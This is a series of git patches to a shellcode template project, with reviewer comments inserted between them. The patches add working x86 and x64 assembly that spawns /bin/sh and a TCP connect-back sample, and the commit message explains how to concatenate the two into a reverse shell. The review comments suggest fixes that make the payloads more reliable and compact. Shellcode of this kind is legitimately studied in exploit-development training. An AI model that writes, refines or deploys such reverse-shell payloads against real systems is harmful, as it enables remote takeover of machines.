From c41649b5077eb3e0d66043658df8bccbdfef0f1a Mon Sep 17 00:00:00 2001 From: Malfurious Date: Sat, 24 Dec 2022 07:50:44 -0500 Subject: shellcode: Move example code to a new directory This is mainly done to keep the top working directory (where the Makefile lives) cleaner. Signed-off-by: Malfurious
--- templates/shellcode/examples/shell32.asm | 15 +++++++++++++++ templates/shellcode/examples/shell64.asm | 16 ++++++++++++++++ 2 files changed, 31 insertions(+) create mode 100644 templates/shellcode/examples/shell32.asm create mode 100644 templates/shellcode/examples/shell64.asm (limited to 'templates/shellcode/examples')
diff --git a/templates/shellcode/examples/shell32.asm b/templates/shellcode/examples/shell32.asm
new file mode 100644
index 0000000..5ff2e12
--- /dev/null
+++ b/templates/shellcode/examples/shell32.asm
@@ -0,0 +1,15 @@
+[SECTION .text]
+global _start
+
+; https://www.exploit-db.com/shellcodes/46809
+
+_start:
+ xor ecx, ecx
+ xor edx, edx
+ push 0xb
+ pop eax
+ push ecx
+ push 0x68732f2f
+ push 0x6e69622f
+ mov ebx, esp
+ int 0x80
diff --git a/templates/shellcode/examples/shell64.asm b/templates/shellcode/examples/shell64.asm
new file mode 100644
index 0000000..2353b6f
--- /dev/null
+++ b/templates/shellcode/examples/shell64.asm
@@ -0,0 +1,16 @@
+[SECTION .text]
+global _start
+
+; https://www.exploit-db.com/shellcodes/47008
+
+_start:
+ xor rsi, rsi
+ xor rdx, rdx
+ push rsi
+ mov rdi, 0x68732f2f6e69622f
+ push rdi
+ push rsp
+ pop rdi
+ mov al, 0x3b
+ cdq
+ syscall
-- cgit v1.2.3 From f21e743212f02dbfb560fa74d983a7e156722d11 Mon Sep 17 00:00:00 2001
From: Malfurious Date: Sun, 15 Jan 2023 08:06:42 -0500 Subject: shellcode: Update /bin/sh shellcodes The shell-spawning shellcodes are rewritten to address the following concerns: - The array parameters to execve are now set properly, to valid arrays on the stack, instead of NULL pointers. - The cdq instruction is no longer used to sign-extend the rax register, since it has not been producing the expected results in gdb. - Labels, sections, and other file metadata are removed in order to support concatenation of shellcode samples to make more complex code. Signed-off-by: Malfurious
--- templates/shellcode/examples/shell32.asm | 29 ++++++++++++------------- templates/shellcode/examples/shell64.asm | 36 +++++++++++++++++++------------- 2 files changed, 37 insertions(+), 28 deletions(-) (limited to 'templates/shellcode/examples')
diff --git a/templates/shellcode/examples/shell32.asm b/templates/shellcode/examples/shell32.asm
index 5ff2e12..6238469 100644
--- a/templates/shellcode/examples/shell32.asm
+++ b/templates/shellcode/examples/shell32.asm
@@ -1,15 +1,16 @@
-[SECTION .text]
-global _start
+; Originally based on https://www.exploit-db.com/shellcodes/46809
+; See shell64.asm for more details.
-; https://www.exploit-db.com/shellcodes/46809
-
-_start:
- xor ecx, ecx
- xor edx, edx
- push 0xb
- pop eax
- push ecx
- push 0x68732f2f
- push 0x6e69622f
- mov ebx, esp
- int 0x80
+; execve("/bin/sh", ["/bin/sh"], [])
+xor eax, eax
+xor ecx, ecx
+push ecx
+push 0x68732f2f
+push 0x6e69622f
+mov ebx, esp
+push ecx
+mov edx, esp
+push ebx
+mov ecx, esp
+mov al, 11
+int 0x80
diff --git a/templates/shellcode/examples/shell64.asm b/templates/shellcode/examples/shell64.asm
index 2353b6f..3812c33 100644
--- a/templates/shellcode/examples/shell64.asm
+++ b/templates/shellcode/examples/shell64.asm
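Review bot: The new shell32 body carries only the single `; execve("/bin/sh", ["/bin/sh"], [])` comment, so a reader has to replay the pushes to work out which register ends up holding which execve argument; per-line comments would make the stack construction checkable at a glance. I would annotate the string build as `push ecx ; NUL terminator`, `push 0x68732f2f ; "//sh" (doubled slash avoids a NUL byte)`, `push 0x6e69622f ; "/bin"`, and tag `mov ebx, esp` / `mov edx, esp` / `mov ecx, esp` as filename, envp (points at a lone NULL) and argv (points at [filename, NULL]) respectively. Nothing follows `int 0x80`: if execve fails it returns -errno in eax and execution runs off the end of the sample, which may be intentional for size but deserves a one-line comment since the commit message says these samples are meant to be concatenated.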
@@ -1,16 +1,24 @@
-[SECTION .text]
-global _start
+; Originally based on https://www.exploit-db.com/shellcodes/47008
-; https://www.exploit-db.com/shellcodes/47008
+; stack layout
+;
+; ┏━━━━━━━━━━━━━━┓
+; ┃ v
+; [ argv0, NULL ] "/bin//sh" NULL
+; ^ ^ ^
+; ┃ ┃ ┃
+; argv envp filename
-_start:
- xor rsi, rsi
- xor rdx, rdx
- push rsi
- mov rdi, 0x68732f2f6e69622f
- push rdi
- push rsp
- pop rdi
- mov al, 0x3b
- cdq
- syscall
+; execve("/bin/sh", ["/bin/sh"], [])
+xor rax, rax
+xor rsi, rsi
+mov rdi, 0x68732f2f6e69622f
+push rsi
+push rdi
+mov rdi, rsp
+push rsi
+mov rdx, rsp
+push rdi
+mov rsi, rsp
+mov al, 59
+syscall
-- cgit v1.2.3 From 1418eaf3054967f1d9856279f1988279c1009ba1 Mon Sep 17 00:00:00 2001 From: Malfurious Date: Sun, 15 Jan 2023 09:29:14 -0500 Subject: shellcode: Add sample for connecting a TCP socket This sample can be used to create a reverse shell when combined with the shell64 sample: cat examples/{tcp64,shell64}.asm >code.asm make ... Signed-off-by: Malfurious
--- templates/shellcode/examples/tcp64.asm | 49 ++++++++++++++++++++++++++++++++++ 1 file changed, 49 insertions(+) create mode 100644 templates/shellcode/examples/tcp64.asm (limited to 'templates/shellcode/examples')
diff --git a/templates/shellcode/examples/tcp64.asm b/templates/shellcode/examples/tcp64.asm
new file mode 100644
index 0000000..1ec3bc8
--- /dev/null
+++ b/templates/shellcode/examples/tcp64.asm
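Review bot: The zeroing idioms at the top of the new shell64 body use the 64-bit forms `xor rax, rax` / `xor rsi, rsi`, which each carry a REX prefix; writing the 32-bit register zero-extends into the full 64-bit register, so `xor eax, eax` and `xor esi, esi` leave identical state one byte shorter each, which matters for a sample meant to be concatenated into larger payloads. The later `mov al, 59` already depends on rax having been zeroed that way, so the change is behaviour-neutral. The stack diagram is a welcome addition; it would be worth stating next to it that `mov rdi, 0x68732f2f6e69622f` is "/bin//sh" with the slash doubled so the immediate contains no NUL byte. As in shell32, nothing follows `syscall`, so a failed execve returns -errno in rax and falls through into whatever bytes come after the sample — presumably intentional, but a short comment would spare the next reader the question.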
@@ -0,0 +1,49 @@
+; Based loosely on https://systemoverlord.com/2018/10/30/understanding-shellcode-the-reverse-shell.html
+
+; socket(AF_INET, SOCK_STREAM, IPPROTO_IP)
+xor rax, rax
+xor rdi, rdi
+xor rsi, rsi
+xor rdx, rdx
+mov al, 41
+mov dil, 2
+mov sil, 1
+syscall
+
+; !! Edit this section to connect back to your listener !!
+;
+; struct sockaddr_in { // Struct size: 16
+; short int sin_family; // AF_INET (2)
+; unsigned short int sin_port; // Set to 8080 below
+; struct in_addr sin_addr; // Set to 127.0.0.1 below
+; unsigned char sin_zero[8];
+; };
+;
+; struct in_addr { // Struct size: 4
+; uint32_t s_addr;
+; };
+xor rbx, rbx
+push rbx
+mov rbx, 0x0100007f901f0002
+push rbx
+
+; connect(fd, sockaddr, sizeof sockaddr)
+mov rdi, rax
+mov rsi, rsp
+mov dl, 16
+xor rax, rax
+mov al, 42
+syscall
+
+; dup2(fd, stdin)
+; dup2(fd, stdout)
+; dup2(fd, stderr)
+xor rsi, rsi
+mov al, 33
+syscall
+mov sil, 1
+mov al, 33
+syscall
+mov sil, 2
+mov al, 33
+syscall
-- cgit v1.2.3
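Review bot: The three dup2 calls set the syscall number with `mov al, 33` without zeroing rax first, so they only work because connect() and the first two dup2s happen to leave small non-negative values (0, 0, 1) in rax; if connect() fails, rax holds -errno, every `mov al, 33` then yields a bogus syscall number, the dup2s silently fail with -ENOSYS, and whatever is concatenated after this sample (shell64, per the commit message) runs on the original stdio rather than the socket. The connect block already does `xor rax, rax` before `mov al, 42`; the dup2 block should do the same, i.e. insert `xor eax, eax` immediately before each of the three `mov al, 33` lines (the 32-bit form is a byte shorter and still zeroes the whole register). Neither the socket() nor the connect() return value is checked, which is usual for minimal shellcode but worth a comment given the fallthrough behaviour above. Separately, `mov rbx, 0x0100007f901f0002` encodes sin_family, port 8080 and 127.0.0.1 correctly, but the immediate contains NUL bytes (the high byte of sin_family and the two zero octets of the address), so unlike the shell samples this one is not NUL-free as written — worth stating in the "Edit this section" comment if NUL-freeness is a goal for these templates.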